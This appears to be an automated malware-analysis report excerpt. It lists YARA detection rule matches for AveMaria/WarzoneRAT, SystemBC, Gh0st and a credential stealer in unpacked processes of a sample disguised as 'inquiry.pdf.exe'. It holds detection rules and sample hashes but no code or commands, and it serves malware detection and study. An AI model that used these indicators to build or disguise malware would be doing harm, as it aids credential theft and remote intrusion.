            Source: 0.2.inquiry.pdf.exe.3b9a2b2.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
            Source: 0.2.inquiry.pdf.exe.3b9a2b2.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
            Source: 18.2.glonkjhg.exe.3c8c5ea.3.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 18.2.glonkjhg.exe.3c8c5ea.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 18.2.glonkjhg.exe.3c8c5ea.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
            Source: 18.2.glonkjhg.exe.3c8c5ea.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
            Source: 18.2.glonkjhg.exe.3c8c5ea.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
            Source: 18.2.glonkjhg.exe.3c8c5ea.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
            Source: 20.3.AddInProcess32.exe.ea6d50.1.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 20.3.AddInProcess32.exe.ea6d50.1.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 20.3.AddInProcess32.exe.ea6d50.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 20.3.AddInProcess32.exe.ea6d50.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
            Source: 20.3.AddInProcess32.exe.ea6d50.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
            Source: 20.3.AddInProcess32.exe.ea6d50.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
            Source: 20.3.AddInProcess32.exe.ea6d50.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
            Source: 20.3.AddInProcess32.exe.ea6d50.1.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 18.2.glonkjhg.exe.3d5d69a.4.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 18.2.glonkjhg.exe.3d5d69a.4.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 18.2.glonkjhg.exe.3d5d69a.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
            Source: 18.2.glonkjhg.exe.3d5d69a.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
            Source: 18.2.glonkjhg.exe.3d5d69a.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
            Source: 18.2.glonkjhg.exe.3d5d69a.4.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 20.3.AddInProcess32.exe.ea8a38.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 20.3.AddInProcess32.exe.ea8a38.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
            Source: 20.3.AddInProcess32.exe.ea8a38.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
            Source: 20.3.AddInProcess32.exe.ea8a38.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
            Source: 20.3.AddInProcess32.exe.ea8a38.2.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 18.2.glonkjhg.exe.3d5d69a.4.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 18.2.glonkjhg.exe.3d5d69a.4.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 18.2.glonkjhg.exe.3d5d69a.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 18.2.glonkjhg.exe.3d5d69a.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
            Source: 18.2.glonkjhg.exe.3d5d69a.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
            Source: 18.2.glonkjhg.exe.3d5d69a.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
            Source: 18.2.glonkjhg.exe.3d5d69a.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
            Source: 18.2.glonkjhg.exe.3d5d69a.4.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 20.3.AddInProcess32.exe.e95278.4.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 20.3.AddInProcess32.exe.e95278.4.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 20.3.AddInProcess32.exe.ea6d50.6.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 20.3.AddInProcess32.exe.ea6d50.6.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 20.3.AddInProcess32.exe.ea6d50.6.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 20.3.AddInProcess32.exe.ea6d50.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
            Source: 20.3.AddInProcess32.exe.ea6d50.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
            Source: 20.3.AddInProcess32.exe.ea6d50.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
            Source: 20.3.AddInProcess32.exe.ea6d50.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
            Source: 20.3.AddInProcess32.exe.ea6d50.6.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 19.0.AddInProcess32.exe.900000.0.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 19.0.AddInProcess32.exe.900000.0.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 19.0.AddInProcess32.exe.900000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 19.0.AddInProcess32.exe.900000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
            Source: 19.0.AddInProcess32.exe.900000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
            Source: 19.0.AddInProcess32.exe.900000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
            Source: 19.0.AddInProcess32.exe.900000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
            Source: 19.0.AddInProcess32.exe.900000.0.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 20.3.AddInProcess32.exe.ea71c8.3.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 20.3.AddInProcess32.exe.ea71c8.3.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 20.3.AddInProcess32.exe.ea71c8.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 20.3.AddInProcess32.exe.ea71c8.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
            Source: 20.3.AddInProcess32.exe.ea71c8.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
            Source: 20.3.AddInProcess32.exe.ea71c8.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
            Source: 20.3.AddInProcess32.exe.ea71c8.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
            Source: 20.3.AddInProcess32.exe.ea71c8.3.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 18.2.glonkjhg.exe.3ca925a.2.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 18.2.glonkjhg.exe.3ca925a.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 18.2.glonkjhg.exe.3ca925a.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
            Source: 18.2.glonkjhg.exe.3ca925a.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
            Source: 18.2.glonkjhg.exe.3ca925a.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
            Source: 18.2.glonkjhg.exe.3ca925a.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
            Source: 20.3.AddInProcess32.exe.e95278.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
            Source: 20.3.AddInProcess32.exe.e95278.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
            Source: 0.2.inquiry.pdf.exe.3c6b362.7.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 0.2.inquiry.pdf.exe.3c6b362.7.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 0.2.inquiry.pdf.exe.3c6b362.7.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 0.2.inquiry.pdf.exe.3c6b362.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
            Source: 0.2.inquiry.pdf.exe.3c6b362.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
            Source: 0.2.inquiry.pdf.exe.3c6b362.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
            Source: 0.2.inquiry.pdf.exe.3c6b362.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
            Source: 0.2.inquiry.pdf.exe.3c6b362.7.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
